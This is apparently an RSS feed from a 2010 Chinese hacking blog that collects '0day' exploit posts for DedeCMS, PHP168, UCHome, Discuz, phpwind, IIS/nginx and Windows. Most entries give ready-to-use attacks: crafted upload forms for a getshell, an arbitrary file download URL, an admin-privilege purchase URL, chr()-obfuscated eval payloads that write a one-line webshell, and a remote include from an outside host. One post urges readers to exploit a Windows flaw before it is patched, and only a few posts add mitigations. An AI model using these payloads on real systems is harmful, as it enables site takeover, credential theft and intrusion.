<![CDATA[许诺's Blog - 0day ]]> http://www.swhack.cn/ zh-cn PBlog2 v2.4 许诺's Blog http://www.swhack.cn/images/logos.gif http://www.swhack.cn/ 许诺's Blog http://www.swhack.cn/article.asp?id=285 <![CDATA[dedecms v5.3-v5.6 Get Shell 0day利用分析 ]]> 251812239@qq.com(许诺) Tue,17 Aug 2010 23:17:24 +0800 http://www.swhack.cn/default.asp?id=285 team:www.wolvez.org

此0day已经出现了相当长一段时间,今天配合小龙同学提供的日志看了下代码,了解了漏洞成因。大多同学对成因不感兴趣,这儿就只公布利用方法。

Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
保存为1.gif

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif

发表文章,然后构造修改表单如下:
复制内容到剪贴板程序代码 程序代码
<form  action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />  
<input  name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>







红色部分都 是需要注意的地方,得根据实际情况进行对应修改。
修改完成后查看文章即可。]]> http://www.swhack.cn/article.asp?id=273 <![CDATA[PHP168下载任意文件漏洞(曾经的漏洞依然存在)]]> 251812239@qq.com(许诺) Wed,30 Jun 2010 21:57:19 +0800 http://www.swhack.cn/default.asp?id=273 首先,我们把需要下载的文件名改用base64_encode形式。如下:

php168/mysql_config.php  



要注意,文件名后面需要多一个空格。
加密后:
cGhwMTY4L215c3FsX2NvbmZpZy5waHAg

这时提交地址:
http://localhost:8090/php168/do/job.php?job=download&url=cGhwMTY4L215c3FsX2NvbmZpZy5waHAg
(注意,网站目录是http://localhost:8090/php168/
即可下载其文件:

]]> http://www.swhack.cn/article.asp?id=265 <![CDATA[IIS源码泄露及文件类型解析错误]]> 251812239@qq.com(许诺) Sun,23 May 2010 22:42:44 +0800 http://www.swhack.cn/default.asp?id=265

漏洞分析:
IIS支持以CGI的方式运行PHP,但是此种模式下,IIS处理请求的时候可能导致一些同80sec提到的nginx安全漏洞一样的问题,任何用户可以远程将任何类型的文件以PHP的方式去解析,你可以通过查看Phpinfo中对php的支持方式,其中如果为CGI/FAST-CGI就可能存在这个问题。

黑盒访问

http://www.80sec.com/robots.txt/1.php

查看文件是否存在和返回的HTTP头就可以知道是否存在此漏洞。

同时,如果服务器支持了PHP,但应用中使用的是asp就可以通过如下方式来直接查看服务端asp源码

http://www.80sec.com/some.asp/1.php

漏洞厂商:http://www.microsoft.com

解决方案:

我们已经尝试联系官方,但是此前你可以通过以下的方式来减少损失

关闭cgi.fix_pathinfo为0

]]> http://www.swhack.cn/article.asp?id=264 <![CDATA[80后爆nginx 0day漏洞,上传图片可入侵100万服务器]]> 251812239@qq.com(许诺) Sat,22 May 2010 14:01:50 +0800 http://www.swhack.cn/default.asp?id=264 黑客入侵,直到5.21日凌晨,nginx尚未发布修复该漏洞的补丁;已经有一些网站被黑了,管理员速修复!


根据Netcraft的统计,直到2010年4月,全球一共有1300万台服务器运行着nginx程序;非常保守的估计,其中至少有600万台服务器运行着nginx并启用了php支持;继续保守的估计,其中有1/6,也就是100万台服务器允许用户上传图片。

由于nginx有漏洞,这100万台服务器可能通过上传图片的方法被黑客轻易的植入木马。植入木马的过程也非常简单,就是把木马改成图片上传就是了,由于危害非常大,就不说细节了。有兴趣的请访问 http://www.80sec.com/nginx-securit.html

临时修复方法如下,可3选其一。

1、设置php.ini的cgi.fix_pathinfo为0,重启php。最方便,但修改设置的影响需要自己评估。

2、给nginx的vhost配置添加如下内容,重启nginx。vhost较少的情况下也很方便。

if ( $fastcgi_script_name ~ \..*\/.*php ) {
return 403;
}

3、禁止上传目录解释PHP程序。不需要动webserver,如果vhost和服务器较多,短期内难度急剧上升;建议在vhost和服务器较少的情况下采用。

]]> http://www.swhack.cn/article.asp?id=255 <![CDATA[php168获取管理员漏洞0day]]> 251812239@qq.com(许诺) Sat,01 May 2010 12:34:49 +0800 http://www.swhack.cn/default.asp?id=255 漏洞程序:php168
风险等级:高
漏洞描述:
由于php168程序对用户组权限购买处理不当,使普通用户具有购买管理员权限 ,从而获得管理权限 。
漏洞利用:
1.注册普通用户
2.通过 http://www.xxx.com/member/buygroup.php?job=buy&gid=3购买管理员权限 。
3.后台 拿webshell
如图:





]]> http://www.swhack.cn/article.asp?id=253 <![CDATA[dedecms爆路径最新漏洞(6个地址)]]> 251812239@qq.com(许诺) Sun,25 Apr 2010 23:01:30 +0800 http://www.swhack.cn/default.asp?id=253 dedecms 5.5程序泄露网站路径信息。

测试地址:

http://www.xxx.com/plus/paycenter/alipay/return_url.php
http://www.xxx.com/plus/paycenter/cbpayment/autoreceive.php
http://www.xxx.com/plus/paycenter/nps/config_pay_nps.php


http://www.xxx.com/plus/task/dede-maketimehtml.php
http://www.xxx.com/plus/task/dede-optimize-table.php
http://www.xxx.com/plus/task/dede-upcache.php
]]> http://www.swhack.cn/article.asp?id=252 <![CDATA[Uchome <=2.0 后台GetWebShell 漏洞]]> 251812239@qq.com(许诺) Wed,21 Apr 2010 23:03:30 +0800 http://www.swhack.cn/default.asp?id=252 漏洞介绍:uchome<=2.0的程序中js.php文件存在代码执行漏洞,原因是正则匹配时引号使用不当,导致可以任意提交并执行PHP代码。
Php中单引号与双引号是有区别的:
" "双引号里面的字段会经过编译器解释,然后再当作HTML代码输出。
' '单引号里面的不进行解释,直接输出。

这里正则匹配后的\\2在双引号里,导致了代码可以执行。

Js.php 问题代码如下
复制内容到剪贴板程序代码 程序代码
01         include template("data/blocktpl/$id");      
  
02                
  
03         $obcontent = ob_get_contents();      
  
04         obclean();      
  
05                
  
06         $s = array("/(\r|\n)/", "/\<div\s+class=\"pages\"\>.+?\<\/div\>/is", "/\s+(href|src)=\"(.+?)\"/ie");      
  
07         $r = array("\n", '', 'js_mkurl("\\1", "\\2")');//代码执行      
  
08        
  
09         $content = '';      
  
10         if($obcontent) {      
  
11                 $obcontent = preg_replace($s, $r, $obcontent);      
  
12                 $lines = explode("\n", $obcontent);      
  
13                 foreach ($lines as $line) {      
  
14                         $line = addcslashes(trim($line), '/\'\\');    
  
15                         $content .= "document.writeln('$line');\n";    
  
16                 }    
  
17         } else {    
  
18                 $content .= "document.writeln('NO DATA')";      
  
19         }    

测试环境:
系统环境:Windows 2003 + IIS + PHP 5.2.9-2 + Mysql 5.0.67
程序环境:Ucenter Home 2.0(官方最新) + Ucenter 1.5(官方最新)

测试方法:

首先我在本地安装了一个全新的uchome.。这个漏洞的前提是首先拿到后台权限。你可以通过社工、旁注、嗅探、Xss 等手段拿到管理员密码并进入后台。
接着打开admincp.php?ac=block&op=add,选择第一个添加一个模块。填上模板名称、其他默认即可。然后提交。如下图


接着在数据显示Html代码处填入如下代码然后提交

复制内容到剪贴板程序代码 程序代码
<a href="{${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}">a</a>  


加密内容为fputs(fopen('data/a.php','w'),'<?php eval($_POST[cmd])?>');

保存后检查一下ID,如果ID是1,则访问一下js.php?id=1

则在data目录下生成a.php一句话木马,密码是cmd

我这里ID是2  所以我访问 js.php?id=2





这就是我们的一句话。连接试试



结果显示.漏洞确实存在并能执行任意PHP代码。。。已经成功得到一个webshelll

漏洞修补:目前官方暂无补丁 临时修补方法如下(目前官方已经补丁。修补办法和下面一样。囧。)

$r = array("\n", '', 'js_mkurl("\\1", "\\2")');
替换为
$r = array("\n", '', "js_mkurl('\\1', '\\2')");]]> http://www.swhack.cn/article.asp?id=229 <![CDATA[谷歌工程师首发:windows最新0day 本地提权 通杀所有版本]]> 251812239@qq.com(许诺) Thu,21 Jan 2010 12:58:55 +0800 http://www.swhack.cn/default.asp?id=229 先放威望再继续看看 免得等下无效那就。。。


谷歌工程师首发:windows最新0day 本地提谷歌果然卧虎藏龙,存在17年的漏洞编译至今通杀
测试英文版系统user提权没问题
中文有的会蓝屏 有的直接提权

国外相关资料:http://archives.neohapsis.com/ar ... e/2010-01/0346.html

此漏洞导致大部分系统可以提权,目前还没出补丁,及时利用吧。

windows最新0day 通杀所有版本
通杀 XP 2K 2K3 2K8 VISTA WIN7
用法:以普通用户登录windows
执行exp 弹出一个cmdshell 这个shell即为 system权限的
请各位系统管理员注意
附件为:Win-ver-exploit Exploit和源码

演示动画:
http://www.anti-sec.cn/fucker/down/0day/win_0day.html





]]> http://www.swhack.cn/article.asp?id=225 <![CDATA[phpwind7.5 0day]]> 251812239@qq.com(许诺) Sun,10 Jan 2010 23:37:16 +0800 http://www.swhack.cn/default.asp?id=225 http://www.xxx.com/apps/groups/index.php?route=groups&basePath=http://wjs001.3.xjp.77169.net/x.txt?

测试可行     过年了  黑客都出来活动了]]> http://www.swhack.cn/article.asp?id=224 <![CDATA[Discuz! 7.1 & 7.2 远程代码执行漏洞]]> 251812239@qq.com(许诺) Wed,06 Jan 2010 18:03:31 +0800 http://www.swhack.cn/default.asp?id=224
任意执行的0day

exp:

复制内容到剪贴板程序代码 程序代码
http://此处为论坛地址/misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]=${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(117).chr(115).chr(101).chr(114).chr(103).chr(114).chr(111).chr(117).chr(112).chr(95).chr(48).chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}
]]>